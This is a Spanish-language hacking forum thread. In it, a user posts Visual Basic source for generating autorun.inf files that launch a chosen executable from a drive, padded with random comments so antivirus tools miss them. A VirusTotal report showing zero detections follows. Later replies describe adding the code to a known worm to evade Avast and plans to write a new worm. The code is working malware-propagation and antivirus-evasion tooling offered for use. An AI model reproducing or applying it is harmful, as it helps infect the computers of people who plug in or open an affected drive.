Bueno hace mucho que me la sabia como hacer un Autorun.Inf FUD solo que como ya abandono las malas practicas empesare a liberar algunos codigos sencillos pero utiles para algunos:
Este es un codigo para generar un archivo Autorun.inf 100% FUD indetectable ante AVIRA Norton, ... bueno ante cualquier AV... hasta la fecha sigue intacto xP.
OJO LOS AUTORU.INF SIEMPRE son DIFERENTES!¡.
'
' ////////////////////////////////////////////////////////////////
' // Autor: BlackZeroX ( Ortega Avila Miguel Angel ) //
' // //
' // Web: http://InfrAngeluX.Sytes.Net/ //
' // //
' // |-> Pueden Distribuir Este Codigo siempre y cuando //
' // no se eliminen los creditos originales de este codigo //
' // No importando que sea modificado/editado o engrandesido //
' // o achicado, si es en base a este codigo //
' ////////////////////////////////////////////////////////////////
option explicit
Public Function GenerarAutorun(StrPath As String, StrExeNameExt As String) As Long
Dim Var(6) As String
Dim DataWrite As String
Dim i As Integer
Dim RN As Integer
Dim nMin As Long
Dim nMax As Long
Dim Sep As String
Dim Char1 As String * 1
Dim Char2 As String * 1
Var(0) = "[Autorun]"
Var(1) = "Open = " & StrExeNameExt
Var(2) = "UseAutoPlay = 1"
Var(3) = "action = @" & StrExeNameExt
Var(4) = "shell\open\Command = " & StrExeNameExt
Var(5) = "shell\open\Default = 1"
Var(6) = "shell\explore\Command = " & StrExeNameExt
If Dir(StrPath, vbDirectory) <> "" Then
Call NormalizePath(StrPath)
StrPath = StrPath & "autorun.inf"
Open StrPath For Binary As 1
For i = 0 To 6
DataWrite = vbCrLf & Var(i)
nMin = NumeroAleatorio(100, 1000)
nMax = nMin + NumeroAleatorio(100, 1000)
For RN = 0 To NumeroAleatorio(nMin, nMax)
Char1 = Chr(NumeroAleatorio(50, 255))
Char2 = Chr(NumeroAleatorio(50, 255))
Sep = Chr$(NumeroAleatorio(1, 255))
While Sep = Char1 Or Sep = Char2: DoEvents
Sep = Chr$(NumeroAleatorio(1, 255))
Wend
DataWrite = DataWrite & vbCrLf & ";" & TextoAleatorio(Char1 & Sep & Char2, Sep, 1)
Next RN
Put 1, , DataWrite
Next i
Close 1
GenerarAutorun = 1
End If
ErrorFatal:
End Function
Private Sub NormalizePath(ByRef sData As String)
sData = IIf(Right$(sData, 1) = "\", sData, sData & "\")
End Sub
Function TextoAleatorio(StrRango As String, Separador As String, Optional LENTEXTMIN As Long = 1, Optional LENTEXTMAX As Long = -1) As String
Dim spli() As String
Dim i As Double
If InStr(StrRango, Separador) > 0 Then
spli = Split(StrRango, Separador)
LENTEXTMAX = LENTEXTMIN + Int(IIf(LENTEXTMAX = -1, NumeroAleatorio(1, 100), LENTEXTMAX))
For i = LENTEXTMIN To LENTEXTMAX
TextoAleatorio = TextoAleatorio & Chr(NumeroAleatorio(Asc(spli(0)), Asc(spli(1))))
Next i
End If
End Function
Public Function NumeroAleatorio(MinNum As Long, MaxNum As Long) As Long
Dim Tmp As Long
If MaxNum < MinNum Then: Tmp = MaxNum: MaxNum = MinNum: MinNum = Tmp
Randomize: NumeroAleatorio = CLng((MinNum - MaxNum + 1) * Rnd + MaxNum)
End Function
la Llamada se realiza en alguna parte de su Codigo fuente de la siguiente manera:
Call GenerarAutorun("c:\", "Ejecuta.exe")
Donde C:\ es la RUTA donde se guardara el archivo Autorun.inf y donde Ejecuta.exe es el archivo en el mismo directorio a ejecutar con el metodo Autorun.Inf
ahora si se quiere ejecutar el exe de un subdirectorio con el respoecto a donde se encuentra el Autorun.inf actual solo hay que hacerlo de la siguiente forma:
Call GenerarAutorun("c:\", "Carpeta\SubCarpeta2\Ejecuta.exe")
Sangriento Infierno Lunar!¡.
Impresionante!!!!!!!!!! :o
Que casualidad que estaba trabajando justo algo similar!!!!!!!!!!
Despues le echo un vistazo y si no entiendo pregunto ;-)
Salu2! ;D
}reporte desde VirusTotal... Ojo como no detecta nada y desde hace 2 años no lo ha hecho ningun AV sigue y debera seguir FUD
Análisis del archivo autorun.inf recibido el 2010.05.27 07:37:26 (UTC)
Motor antivirus Versión Última actualización Resultado
a-squared 4.5.0.50 2010.05.10 -
AhnLab-V3 2010.05.27.00 2010.05.27 -
AntiVir 8.2.1.242 2010.05.26 -
Antiy-AVL 2.0.3.7 2010.05.26 -
Authentium 5.2.0.5 2010.05.27 -
Avast 4.8.1351.0 2010.05.27 -
Avast5 5.0.332.0 2010.05.27 -
AVG 9.0.0.787 2010.05.27 -
BitDefender 7.2 2010.05.27 -
CAT-QuickHeal 10.00 2010.05.27 -
ClamAV 0.96.0.3-git 2010.05.27 -
Comodo 4942 2010.05.25 -
DrWeb 5.0.2.03300 2010.05.27 -
eSafe 7.0.17.0 2010.05.26 -
eTrust-Vet 35.2.7513 2010.05.27 -
F-Prot 4.6.0.103 2010.05.26 -
F-Secure 9.0.15370.0 2010.05.27 -
Fortinet 4.1.133.0 2010.05.26 -
GData 21 2010.05.27 -
Ikarus T3.1.1.84.0 2010.05.27 -
Jiangmin 13.0.900 2010.05.24 -
Kaspersky 7.0.0.125 2010.05.27 -
McAfee 5.400.0.1158 2010.05.27 -
McAfee-GW-Edition 2010.1 2010.05.27 -
Microsoft 1.5802 2010.05.27 -
NOD32 5148 2010.05.26 -
Norman 6.04.12 2010.05.26 -
nProtect 2010-05-26.01 2010.05.26 -
Panda 10.0.2.7 2010.05.26 -
PCTools 7.0.3.5 2010.05.27 -
Prevx 3.0 2010.05.27 -
Rising 22.49.03.01 2010.05.27 -
Sophos 4.53.0 2010.05.27 -
Sunbelt 6362 2010.05.27 -
Symantec 20101.1.0.89 2010.05.27 -
TheHacker 6.5.2.0.287 2010.05.25 -
TrendMicro 9.120.0.1004 2010.05.27 -
TrendMicro-HouseCall 9.120.0.1004 2010.05.27 -
VBA32 3.12.12.5 2010.05.26 -
ViRobot 2010.5.20.2326 2010.05.27 -
VirusBuster 5.0.27.0 2010.05.26
Dulce Infierno Lunar!¡.
ALA :o
Pense que despues del Conflicker esto era mas detectado... :silbar:
Salu2! ;)
Cita de: *PsYkE1* en 27 Mayo 2010, 09:47 AM
ALA :o
Pense que despues del Conflicker esto era mas detectado... :silbar:
Salu2! ;)
Mi codigo genera archivos
autorun.inf de forma distinta SIEMPRE puedes cambiar los rango dentro del fuente si hay dudas avisar que explico las lines si es nesesario.
P.D.: Ya tiene 3 años que uso este metodo y hasta ahora no me lo a detectado ningun AV xP, y el reporte de Virus Total sigue en 0/41 LOL.
Dulce Infierno Lunar!¡,
Ya, ya vi que era de forma aleatoria... :P
Yo pensaba hacer algo asi, pero no lo tenia tan claro... :xD
Salu2!
Podrias pegar un ejemplo de Autorun generado :P :P
Haber para que entiendan el codigo de forma rapida y precisa:
las variables o registros de un autorun.inf no se cifran ojo:
en un autorun.inf se le pueden adicionar lineas de comentarios (Esto no es nuevo).
* El codigo que pongo aqui lo que hace es meter lineas de comentarios Aleatroias.
* Los registros del autorun.inf siguen intactos (Si abren el archivo resultante y usan buscar y buscan [autorun], u otra linea las encontraran).
* Las longitudes de los textos como comentarios son aleatorios al igual que los que existen ente los registros del arhivo autorun.inf.
* El archivo resultante no pesa 1 o 3 kb pesa mas de 100kb por lo menos puede pesar tanto se desee!¡, pero el optimo para mi fue este que esta entre 200kb y 380kb.
Dulce Infierno Lunar!¡.
Eso esta clarisimo, solo digo que un ejemplo lo dejaria clarisimo!! :xD
Bueno no se si se acuerdan de la aplicacion TRIBANT del gusanito que fue sacado ya hace bastante tiempo, pues lo que hice fue añadirle la parte de codigo que indico, y wala no lo detecto el autorun.inf el avast 5.0 lo malo que al tribant si lo detectaron, estoy pensando hacer uso de reingenieria y poder crear el primer gusano homero
Reingenieria? que es eso?
no sera Ingenieria Inversa? :P
NO reingenieria aca en mi pais le llaman asi los muchachos cuando agarran codigo le dan un cambio de variables y listo presentan asi...
Yo lo denomino reingenieria porque veo el codigo saco ideas, y trato de mejorarlo, a veces me resulta otras veces no se me va todo al tacho de la basura